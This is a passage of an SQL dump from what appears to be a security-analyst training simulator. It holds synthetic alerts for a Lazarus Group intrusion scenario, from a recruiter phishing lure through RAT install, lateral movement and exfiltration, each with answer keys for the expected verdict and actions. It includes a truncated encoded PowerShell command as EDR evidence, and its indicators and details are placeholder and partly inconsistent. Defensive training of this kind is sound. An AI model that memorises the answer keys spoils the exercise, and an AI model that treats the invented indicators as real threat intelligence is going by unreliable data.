BTC\",\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"compromised_user\",\"internal_ip\":\"192.168.1.25\",\"malicious_activity\":true}', '2026-03-01 23:02:30', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with Lazarus Group operations.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"User account used in unauthorized cryptocurrency transactions.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.876Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:00Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_wallet\\\":\\\"1A2b3C4d5E6F7G8H9I0J\\\",\\\"destination_wallet\\\":\\\"3K4m5N6o7P8Q9R0S1T2U\\\",\\\"amount\\\":\\\"50 BTC\\\",\\\"transaction_fee\\\":\\\"0.0005 BTC\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"malicious_activity\\\":true}\"},{\"timestamp\":\"2026-03-02T13:54:06.876Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:00Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_wallet\\\":\\\"1A2b3C4d5E6F7G8H9I0J\\\",\\\"destination_wallet\\\":\\\"3K4m5N6o7P8Q9R0S1T2U\\\",\\\"amount\\\":\\\"50 BTC\\\",\\\"transaction_fee\\\":\\\"0.0005 BTC\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"malicious_activity\\\":true}\"},{\"timestamp\":\"2026-03-02T13:53:06.876Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:00Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_wallet\\\":\\\"1A2b3C4d5E6F7G8H9I0J\\\",\\\"destination_wallet\\\":\\\"3K4m5N6o7P8Q9R0S1T2U\\\",\\\"amount\\\":\\\"50 BTC\\\",\\\"transaction_fee\\\":\\\"0.0005 BTC\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"malicious_activity\\\":true}\"},{\"timestamp\":\"2026-03-02T13:52:06.876Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:00Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_wallet\\\":\\\"1A2b3C4d5E6F7G8H9I0J\\\",\\\"destination_wallet\\\":\\\"3K4m5N6o7P8Q9R0S1T2U\\\",\\\"amount\\\":\\\"50 BTC\\\",\\\"transaction_fee\\\":\\\"0.0005 BTC\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"malicious_activity\\\":true}\"},{\"timestamp\":\"2026-03-02T13:51:06.876Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:00Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_wallet\\\":\\\"1A2b3C4d5E6F7G8H9I0J\\\",\\\"destination_wallet\\\":\\\"3K4m5N6o7P8Q9R0S1T2U\\\",\\\"amount\\\":\\\"50 BTC\\\",\\\"transaction_fee\\\":\\\"0.0005 BTC\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"malicious_activity\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1366, 'Suspicious LinkedIn Connection Request', 'medium', 'LinkedIn activity logs', 'An aerospace engineer has received a connection request from a profile claiming to be a recruiter with a suspicious job offer. The profile is suspected to be fake and may be part of a social engineering attempt to gain initial access.', 'Social Engineering', 'T1566.002 - Spearphishing Link', 1, 'Closed', 232, '{\"event_time\":\"2023-10-15T14:23:52Z\",\"user_id\":\"aero.eng123\",\"user_email\":\"engineer@aerospaceco.com\",\"connection_request_id\":\"req_987654321\",\"requester_profile\":{\"name\":\"John Doe\",\"profile_url\":\"https://linkedin.com/in/johndoe-fake\",\"headline\":\"Senior Recruiter at TopTech Talent\",\"email\":\"john.doe@toptechtalent.com\",\"ip_address\":\"203.0.113.45\"},\"job_offer_details\":{\"position\":\"Project Manager\",\"location\":\"Remote\",\"salary\":\"150,000 USD\",\"offer_link\":\"http://maliciouslink.com/joboffer\"},\"internal_ip\":\"192.168.1.10\",\"notable_hash\":\"4d6f6e6579726174696f6e68617368\"}', '2026-03-01 23:03:23', '2026-03-14 16:41:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@toptechtalent.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Email domain does not match known recruitment agencies.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciouslink.com/joboffer\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"malicious\",\"details\":\"URL linked to malware distribution.\"}}],\"recommended_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.877Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"user_id\\\":\\\"aero.eng123\\\",\\\"user_email\\\":\\\"engineer@aerospaceco.com\\\",\\\"connection_request_id\\\":\\\"req_987654321\\\",\\\"requester_profile\\\":{\\\"name\\\":\\\"John Doe\\\",\\\"profile_url\\\":\\\"https://linkedin.com/in/johndoe-fake\\\",\\\"headline\\\":\\\"Senior Recruiter at TopTech Talent\\\",\\\"email\\\":\\\"john.doe@toptechtalent.com\\\",\\\"ip_address\\\":\\\"203.0.113.45\\\"},\\\"job_offer_details\\\":{\\\"position\\\":\\\"Project Manager\\\",\\\"location\\\":\\\"Remote\\\",\\\"salary\\\":\\\"150,000 USD\\\",\\\"offer_link\\\":\\\"http://maliciouslink.com/joboffer\\\"},\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"notable_hash\\\":\\\"4d6f6e6579726174696f6e68617368\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.877Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"user_id\\\":\\\"aero.eng123\\\",\\\"user_email\\\":\\\"engineer@aerospaceco.com\\\",\\\"connection_request_id\\\":\\\"req_987654321\\\",\\\"requester_profile\\\":{\\\"name\\\":\\\"John Doe\\\",\\\"profile_url\\\":\\\"https://linkedin.com/in/johndoe-fake\\\",\\\"headline\\\":\\\"Senior Recruiter at TopTech Talent\\\",\\\"email\\\":\\\"john.doe@toptechtalent.com\\\",\\\"ip_address\\\":\\\"203.0.113.45\\\"},\\\"job_offer_details\\\":{\\\"position\\\":\\\"Project Manager\\\",\\\"location\\\":\\\"Remote\\\",\\\"salary\\\":\\\"150,000 USD\\\",\\\"offer_link\\\":\\\"http://maliciouslink.com/joboffer\\\"},\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"notable_hash\\\":\\\"4d6f6e6579726174696f6e68617368\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.877Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"user_id\\\":\\\"aero.eng123\\\",\\\"user_email\\\":\\\"engineer@aerospaceco.com\\\",\\\"connection_request_id\\\":\\\"req_987654321\\\",\\\"requester_profile\\\":{\\\"name\\\":\\\"John Doe\\\",\\\"profile_url\\\":\\\"https://linkedin.com/in/johndoe-fake\\\",\\\"headline\\\":\\\"Senior Recruiter at TopTech Talent\\\",\\\"email\\\":\\\"john.doe@toptechtalent.com\\\",\\\"ip_address\\\":\\\"203.0.113.45\\\"},\\\"job_offer_details\\\":{\\\"position\\\":\\\"Project Manager\\\",\\\"location\\\":\\\"Remote\\\",\\\"salary\\\":\\\"150,000 USD\\\",\\\"offer_link\\\":\\\"http://maliciouslink.com/joboffer\\\"},\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"notable_hash\\\":\\\"4d6f6e6579726174696f6e68617368\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.877Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"user_id\\\":\\\"aero.eng123\\\",\\\"user_email\\\":\\\"engineer@aerospaceco.com\\\",\\\"connection_request_id\\\":\\\"req_987654321\\\",\\\"requester_profile\\\":{\\\"name\\\":\\\"John Doe\\\",\\\"profile_url\\\":\\\"https://linkedin.com/in/johndoe-fake\\\",\\\"headline\\\":\\\"Senior Recruiter at TopTech Talent\\\",\\\"email\\\":\\\"john.doe@toptechtalent.com\\\",\\\"ip_address\\\":\\\"203.0.113.45\\\"},\\\"job_offer_details\\\":{\\\"position\\\":\\\"Project Manager\\\",\\\"location\\\":\\\"Remote\\\",\\\"salary\\\":\\\"150,000 USD\\\",\\\"offer_link\\\":\\\"http://maliciouslink.com/joboffer\\\"},\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"notable_hash\\\":\\\"4d6f6e6579726174696f6e68617368\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.877Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"user_id\\\":\\\"aero.eng123\\\",\\\"user_email\\\":\\\"engineer@aerospaceco.com\\\",\\\"connection_request_id\\\":\\\"req_987654321\\\",\\\"requester_profile\\\":{\\\"name\\\":\\\"John Doe\\\",\\\"profile_url\\\":\\\"https://linkedin.com/in/johndoe-fake\\\",\\\"headline\\\":\\\"Senior Recruiter at TopTech Talent\\\",\\\"email\\\":\\\"john.doe@toptechtalent.com\\\",\\\"ip_address\\\":\\\"203.0.113.45\\\"},\\\"job_offer_details\\\":{\\\"position\\\":\\\"Project Manager\\\",\\\"location\\\":\\\"Remote\\\",\\\"salary\\\":\\\"150,000 USD\\\",\\\"offer_link\\\":\\\"http://maliciouslink.com/joboffer\\\"},\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"notable_hash\\\":\\\"4d6f6e6579726174696f6e68617368\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1367, 'Malicious Attachment in Follow-up Email', 'high', 'Corporate email gateway', 'An email with a job offer attachment was received, containing a trojan designed to execute upon opening. The attachment was identified as a known malicious artifact linked to Lazarus Group activities.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"email_sender\":\"hr@fakesite.com\",\"email_recipient\":\"jdoe@corporate.com\",\"subject\":\"Job Offer\",\"attachment\":{\"filename\":\"Job_Offer_Details.docx\",\"hash\":\"7f5a8d7e5b9c4a6d9c3a7a8b5c6d4e5f\",\"file_type\":\"docx\"},\"malware_signature\":\"Trojan:Win32/FakeOffer\",\"indicators\":{\"attachment_hash\":\"7f5a8d7e5b9c4a6d9c3a7a8b5c6d4e5f\",\"malicious_ip\":\"203.0.113.45\"}}', '2026-03-01 23:03:23', '2026-03-14 16:42:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns by Lazarus Group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"7f5a8d7e5b9c4a6d9c3a7a8b5c6d4e5f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known trojan used in targeted phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"hr@fakesite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Database\",\"verdict\":\"suspicious\",\"details\":\"Email domain recently registered and used in phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Attachment in Follow-up Email\",\"date\":\"2026-03-02T13:55:06.879Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1368, 'Establishment of Remote Access Trojan (RAT)', 'critical', 'Endpoint protection logs', 'A Remote Access Trojan (RAT) named \'Backdoor.LazarusRat\' was detected on the victim\'s machine, allowing persistent access for the attacker. The RAT installation was initiated from a suspicious IP address, and files associated with the Lazarus Group were found.', 'Malware', 'T1219 - Remote Access Tools', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"RAT-Installation\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"process_name\":\"svchost.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"lazarus_rat.dll\",\"username\":\"victim_user\",\"action\":\"File created\",\"threat_name\":\"Backdoor.LazarusRat\",\"severity\":\"Critical\"}', '2026-03-01 23:03:23', '2026-03-14 16:42:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Victim\'s machine internal IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lazarus RAT.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lazarus_rat.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Malicious DLL used for RAT installation.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"victim_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account on the compromised machine.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1369, 'Lateral Movement to Secure Network Segments', 'high', 'Network traffic analysis', 'Using compromised credentials, the attacker moves laterally to access secure segments of the network. This activity is consistent with the Lazarus Group\'s known tactics.', 'Network Intrusion', 'T1021 - Remote Services', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-10T14:35:17Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.23\",\"protocol\":\"RDP\",\"action\":\"allowed\",\"username\":\"jdoe\",\"auth_method\":\"NTLM\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"confidential_project.docx\",\"event_description\":\"Successful RDP connection using compromised credentials\",\"network_segment\":\"Sensitive_Segment_A\",\"severity\":\"High\"}', '2026-03-01 23:03:23', '2026-03-14 16:43:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network segment for sensitive projects\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1370, 'Data Exfiltration Attempt Detected', 'critical', 'Data loss prevention system', 'An exfiltration attempt was detected where classified project files were being transferred to a known malicious remote server. The attack was executed by a threat actor using advanced techniques indicative of the Lazarus Group.', 'Data Breach', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', 232, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"DLP-EXFIL-20231015\",\"source_ip\":\"192.168.1.45\",\"source_username\":\"jdoe\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"classified_project_files.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"Blocked\",\"alert_reason\":\"Exfiltration attempt to known malicious IP\",\"reference\":\"Lazarus Group TTPs\",\"related_malware\":\"WannaCry\"}', '2026-03-01 23:03:23', '2026-03-14 16:43:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"classified_project_files.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive project files.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malware used by Lazarus Group.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"HR Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user credentials compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.888Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"source_username\\\":\\\"jdoe\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"classified_project_files.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_reason\\\":\\\"Exfiltration attempt to known malicious IP\\\",\\\"reference\\\":\\\"Lazarus Group TTPs\\\",\\\"related_malware\\\":\\\"WannaCry\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.888Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"source_username\\\":\\\"jdoe\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"classified_project_files.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_reason\\\":\\\"Exfiltration attempt to known malicious IP\\\",\\\"reference\\\":\\\"Lazarus Group TTPs\\\",\\\"related_malware\\\":\\\"WannaCry\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.888Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"source_username\\\":\\\"jdoe\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"classified_project_files.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_reason\\\":\\\"Exfiltration attempt to known malicious IP\\\",\\\"reference\\\":\\\"Lazarus Group TTPs\\\",\\\"related_malware\\\":\\\"WannaCry\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.888Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"source_username\\\":\\\"jdoe\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"classified_project_files.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_reason\\\":\\\"Exfiltration attempt to known malicious IP\\\",\\\"reference\\\":\\\"Lazarus Group TTPs\\\",\\\"related_malware\\\":\\\"WannaCry\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.888Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 